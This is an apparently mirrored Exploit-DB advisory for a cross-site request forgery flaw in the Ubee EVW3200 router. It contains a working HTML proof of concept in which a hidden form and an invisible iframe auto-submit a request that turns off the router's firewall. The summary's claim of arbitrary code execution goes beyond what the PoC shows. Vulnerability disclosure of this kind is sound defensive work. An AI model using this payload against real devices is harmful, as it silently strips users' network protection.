Ubee EVW3200 - Multiple Cross Site Request Forgery

vendor:

EVW3200

by:

Jeroen - IT Nerdbox

8,8

CVSS

HIGH

Cross Site Request Forgery

352

CWE

Product Name: EVW3200

Affected Version From: All

Affected Version To: All

Patch Exists: NO

Related CWE: N/A

CPE: h:ubee_interactive:evw3200

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2014

Ubee EVW3200 – Multiple Cross Site Request Forgery

The Ubee ECV3200 does not use Anti CSRF tokens in any of its forms. A proof of concept is provided which uses a form with a hidden input field and an iframe to submit the form. This allows an attacker to execute arbitrary code on the device.

Mitigation:

Implement Anti CSRF tokens in all forms.

Source

Exploit-DB raw data:

# Exploit Title: Ubee EVW3200 - Multiple Cross Site Request Forgery

# Google Dork: N/A

# Date: 02-03-2014

# Exploit Author: Jeroen - IT Nerdbox

# Vendor Homepage: http://www.ubeeinteractive.com/

# Software Link:
http://www.ubeeinteractive.com/products/cable?field_product_catetory_tid=20

# Version: All

# Tested on: N/A

# CVE : N/A

#

## Description:

#

# The Ubee ECV3200 does not use Anti CSRF tokens in any of its forms. 

#

## PoC:

# 

# <form name="reseller" method="POST"
action="http://192.168.178.1/goform/RgContentFilter" id="csrf_attack"
target="csrf_iframe">

#   <input type="hidden" name="cbFirewall" value="0">

# </form>

#

# <iframe id="csrf_iframe" style="visibility:hidden;display:none"></iframe>

#

# <script>

#  document.getElementById('csrf_attack').submit();

# </script>

# <center>The payload has been executed....</center> 

#</html>

#

#

# More information can be found at:
http://www.nerdbox.it/ubee-evw3200-multiple-vulnerabilities/